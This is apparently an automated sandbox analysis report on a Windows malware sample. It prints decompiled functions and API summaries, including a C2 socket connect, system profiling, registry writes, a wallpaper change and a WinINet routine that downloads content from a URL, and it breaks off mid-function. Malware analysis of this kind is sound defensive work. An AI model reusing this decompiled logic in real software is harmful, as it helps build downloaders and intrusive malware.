                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00413C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x41c1f0 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x41c200);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x41c1fc) == 0) {
							ShowWindow( *0x41c1fc, 9);
							SetForegroundWindow( *0x41c1fc);
						} else {
							ShowWindow( *0x41c1fc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L4:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L4;
			}








                                  0x00413c47
                                  0x00413c48
                                  0x00413d1c
                                  0x00413d2c
                                  0x00413d31
                                  0x00413d37
                                  0x00000000
                                  0x00413d37
                                  0x00413c4e
                                  0x00413c53
                                  0x00413d03
                                  0x00000000
                                  0x00000000
                                  0x00413d0c
                                  0x00413d14
                                  0x00413d14
                                  0x00413c5e
                                  0x00413c7a
                                  0x00413c7f
                                  0x00413cd1
                                  0x00413ceb
                                  0x00413cf7
                                  0x00413cd3
                                  0x00413cdb
                                  0x00413cdb
                                  0x00000000
                                  0x00413cd1
                                  0x00413c84
                                  0x00413c97
                                  0x00413ca0
                                  0x00413cbb
                                  0x00000000
                                  0x00413cbb
                                  0x00413c86
                                  0x00413c89
                                  0x00413c8c
                                  0x00413c69
                                  0x00000000
                                  0x00413c6c
                                  0x00413c60
                                  0x00413c63
                                  0x00413c66
                                  0x00000000

                                  APIs
                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 00413C6C
                                  • GetCursorPos.USER32(?), ref: 00413C97
                                  • SetForegroundWindow.USER32(?), ref: 00413CA0
                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00413CBB
                                  • Shell_NotifyIconA.SHELL32(00000002,0041C200), ref: 00413D0C
                                  • ExitProcess.KERNEL32 ref: 00413D14
                                  • CreatePopupMenu.USER32 ref: 00413D1C
                                  • AppendMenuA.USER32 ref: 00413D31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                  • String ID: Close
                                  • API String ID: 1657328048-3535843008
                                  • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction ID: 3a9117e372e52b2e565462b42d507c4b1172ca251bbe850fbb6b863f13e0a9c7
                                  • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                  • Instruction Fuzzy Hash: 3A210972180609FBDB115FA4ED0DBEA3F35FB08702F208021F606A51B1D7799AA0EB5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E7F7, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040E91D
                                    • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E845
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                    • Part of subcall function 0041228F: GlobalMemoryStatusEx.KERNEL32(?), ref: 004122A0
                                    • Part of subcall function 0041230A: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                    • Part of subcall function 0041230A: GetProcAddress.KERNEL32(00000000), ref: 00412324
                                    • Part of subcall function 0041230A: Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                    • Part of subcall function 0041230A: __aulldiv.LIBCMT ref: 004123E4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?,00000095), ref: 0040E87F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,?,00000000), ref: 0040E898
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,z@,00000000), ref: 0040E8AC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8B7
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000096), ref: 0040E8DE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$D@1@@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$AddressGlobalHandleMemoryModuleProcSleepStatus__aulldivconnect
                                  • String ID: z@
                                  • API String ID: 1937136672-317290069
                                  • Opcode ID: a246132ec2ecd2f0ae49596ae3424449e4833eaa9590391719729fa14ec755ea
                                  • Instruction ID: 66f006b43ec3188ac29da0c8503291dee518f3a81564da720cf043436550991c
                                  • Opcode Fuzzy Hash: a246132ec2ecd2f0ae49596ae3424449e4833eaa9590391719729fa14ec755ea
                                  • Instruction Fuzzy Hash: E1318472C0010CEBDB01EBA1DD49EDEB778AB54305F00416AFA12A70D1EFB55B48CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BD9B, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 62COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                  • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 0040BDC6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                  • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                  • API String ID: 2054586871-62392802
                                  • Opcode ID: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                  • Instruction ID: 2660231c1808b36434503ece8d2e95605cb547f4994df65369f224bebc220479
                                  • Opcode Fuzzy Hash: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                  • Instruction Fuzzy Hash: 8D01C43A58122AA2CE049AD0EC01ADA7708CF057B2F71007BAE04B76C0CB38D9854BCD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004121E8, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 51COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040B5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                    • Part of subcall function 0040B5A2: RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                    • Part of subcall function 0040B5A2: RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                    • Part of subcall function 0040B5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                  • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412210
                                  • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412223
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 0041222D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412236
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00409BE6,?), ref: 0041224F
                                    • Part of subcall function 0041290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6B03CB60,?,?,0041225E,?), ref: 00412919
                                    • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                    • Part of subcall function 0041290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                    • Part of subcall function 0041290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                    • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                    • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                    • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00412265
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041226E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041227B
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412284
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                  • String ID: .exe$http\shell\open\command
                                  • API String ID: 2647146128-4091164470
                                  • Opcode ID: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                  • Instruction ID: d6ae35875aa51399811599ff5055279212e103e4be7b08956a6055bd29980306
                                  • Opcode Fuzzy Hash: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                  • Instruction Fuzzy Hash: F011127291061DEBCF04EBE0EC49FFD7738FB48304F544425F512A21A0DA74A148CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041000F, Relevance: 18.1, APIs: 12, Instructions: 81COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                  • EnumDisplayMonitors.USER32(00000000,00000000,0041010A,00000000), ref: 0041003D
                                  • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 0041004D
                                  • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 00410078
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                  • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 004100DF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$DisplayEnum$??0?$basic_string@??1?$basic_string@Devices$G@1@@V01@@$G@2@@0@Hstd@@MonitorsV01@V10@V?$basic_string@Y?$basic_string@
                                  • String ID:
                                  • API String ID: 2807017801-0
                                  • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                  • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                  • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                  • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401EA2, Relevance: 18.1, APIs: 12, Instructions: 80COMMON
                                  Download Yara Rule
                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00401EA7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                  • String ID:
                                  • API String ID: 3851886811-0
                                  • Opcode ID: 8b148193296b1a1f6a81c6ab41585fcb54b43abeb16e20dcdf97d49bc51763a5
                                  • Instruction ID: 3c13f4a99a68d7d03b3b7bfc4098c6c0fbf2233efe5d64f965fa74e17679f3d5
                                  • Opcode Fuzzy Hash: 8b148193296b1a1f6a81c6ab41585fcb54b43abeb16e20dcdf97d49bc51763a5
                                  • Instruction Fuzzy Hash: 3C212FB280010DEBCB05EBD1ED499EEBB78FB54315F14412AF412A7061EB755A48CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004133FE, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041343B
                                    • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                    • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                    • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                    • Part of subcall function 0040B708: RegSetValueExA.KERNEL32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                    • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                    • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B10,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041347F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416D58,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134BA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B18,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 004134F5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,00000000,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 00413537
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?), ref: 00413562
                                  • SystemParametersInfoW.USER32 ref: 00413580
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@D@1@@$??1?$basic_string@?c_str@?$basic_string@?size@?$basic_string@CloseCreateInfoParametersSystemValue
                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                  • API String ID: 3561681748-3576401099
                                  • Opcode ID: 48dd3d0126de30dec13a4ca163c472832330ee869f564e0657d470c6adcd1593
                                  • Instruction ID: 9cbbbfad74e45987a2bd5f73a37c109ae42610d4aeaf5eddbb83fc0603d2e269
                                  • Opcode Fuzzy Hash: 48dd3d0126de30dec13a4ca163c472832330ee869f564e0657d470c6adcd1593
                                  • Instruction Fuzzy Hash: 5041A772B50604BBEB1076A59C47FEF393ED780B50F51006AF9116B2C1D7AA8AC446EF
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412553, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103networkfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E00412553(void* __ecx, void* __eflags, char* _a4, void** _a8, unsigned int _a12, signed int _a15) {
				void* _v8;
				char* _v12;
				void* _v16;
				void _v10016;
				void* _t35;
				void* _t36;
				void* _t42;
				void* _t44;
				void* _t46;
				unsigned int* _t55;
				signed int _t57;
				signed int _t58;
				signed int _t64;
				signed int _t74;
				char* _t98;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;

				E00413ED0(0x271c, __ecx);
				_t55 = _a12;
				_a15 = _a15 & 0x00000000;
				_t98 = 0;
				 *_a8 = 0;
				 *_t55 = 0;
				_t35 = InternetOpenA("user", 1, 0, 0, 0);
				_v16 = _t35;
				_t36 = InternetOpenUrlA(_t35, _a4, 0, 0, 0x80000000, 0);
				_v8 = _t36;
				if(_t36 != 0) {
					_a12 = 0;
					_a4 = 0;
					while(1) {
						_t10 =  &_a12; // 0x415664
						_t42 = InternetReadFile(_v8,  &_v10016, 0x2710, _t10);
						if(_t42 != 0 && _a12 <= _t98) {
							break;
						}
						_t44 =  *_t55 + _a12;
						_push(_t44);
						L00413E84();
						_t57 =  *_t55;
						_t100 = _a4;
						_t58 = _t57 >> 2;
						_v12 = memcpy(_t44, _t100, _t58 << 2);
						_push(_a4);
						_t46 = memcpy(_t100 + _t58 + _t58, _t100, _t57 & 0x00000003);
						_t101 =  &_v10016;
						_t64 = _a12 >> 2;
						memcpy(_t101 + _t64 + _t64, _t101, memcpy(_t46 +  *_t55, _t101, _t64 << 2) & 0x00000003);
						_t103 = _t103 + 0x30;
						L00413EBE();
						_a4 = _v12;
						 *_t55 =  *_t55 + _a12;
						_t98 = 0;
					}
					_push( *_t55);
					L00413E84();
					_t102 = _a4;
					 *_a8 = _t42;
					_t74 =  *_t55 >> 2;
					memcpy(_t102 + _t74 + _t74, _t102, memcpy(_t42, _t102, _t74 << 2) & 0x00000003);
					_a15 = 1;
				}
				InternetCloseHandle(_v16);
				InternetCloseHandle(_v8);
				return _a15;
			}






















                                  0x0041255b
                                  0x00412564
                                  0x00412568
                                  0x0041256c
                                  0x00412573
                                  0x0041257a
                                  0x0041257c
                                  0x0041258d
                                  0x00412591
                                  0x00412599
                                  0x0041259c
                                  0x004125a3
                                  0x004125a6
                                  0x004125a9
                                  0x004125a9
                                  0x004125bc
                                  0x004125c4
                                  0x00000000
                                  0x00000000
                                  0x004125cd
                                  0x004125d0
                                  0x004125d1
                                  0x004125d6
                                  0x004125d8
                                  0x004125df
                                  0x004125e6
                                  0x004125ec
                                  0x004125ef
                                  0x004125fa
                                  0x00412600
                                  0x0041260a
                                  0x0041260a
                                  0x0041260c
                                  0x00412615
                                  0x0041261b
                                  0x0041261e
                                  0x0041261e
                                  0x00412622
                                  0x00412624
                                  0x0041262a
                                  0x00412632
                                  0x00412638
                                  0x00412642
                                  0x00412644
                                  0x00412648
                                  0x00412652
                                  0x00412657
                                  0x0041265f

                                  APIs
                                  • InternetOpenA.WININET(user,00000001,00000000,00000000,00000000), ref: 0041257C
                                  • InternetOpenUrlA.WININET(00000000,0040E1CA,00000000,00000000,80000000,00000000), ref: 00412591
                                  • InternetReadFile.WININET(00000000,?,00002710,dVA), ref: 004125BC
                                  • ??2@YAPAXI@Z.MSVCRT ref: 004125D1
                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041260C
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00412624
                                  • InternetCloseHandle.WININET(?), ref: 00412652
                                  • InternetCloseHandle.WININET(00000000), ref: 00412657
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseHandleOpen$??3@FileRead
                                  • String ID: dVA$user
                                  • API String ID: 3314639739-756348157
                                  • Opcode ID: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                  • Instruction ID: 2817f394542dad185436be8b0d9cd541a8c5b80d7f45bfec7e57154c42759719
                                  • Opcode Fuzzy Hash: 2c425c2ac83949829cfd64d28bcc986e464b329bf07d6f53e08b57cf980523a3
                                  • Instruction Fuzzy Hash: FC316A31A00229AFCF25DF68D885ADF7FA9FF49350F14406AF909D7250CA74AA90DB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004078BB, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 100sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 57%
                                  			E004078BB(void* __ecx) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v8;
				void* _t40;
				void* _t44;

				_push(__ecx);
				 *0x41b9b8 = 1;
				Sleep( *0x41b9b4);
				_v5 = _v5 & 0x00000000;
				_v6 = _v6 & 0x00000000;
				_v7 = _v7 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t44 = 0;
				do {
					if(_v5 == 0) {
						L2:
						_v5 = E00407767();
					}
					if(_v6 == 0) {
						_v6 = E0040751B();
					}
					if(_v8 == 0) {
						_v8 = E0040728F();
					}
					if(_v7 == 0) {
						_v7 = E004071CF();
					}
					if(_t44 == 0) {
						_t44 = E0040710F();
					}
					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
						Sleep(0x1388);
					}
					if(_v5 == 0) {
						goto L2;
					}
				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0);
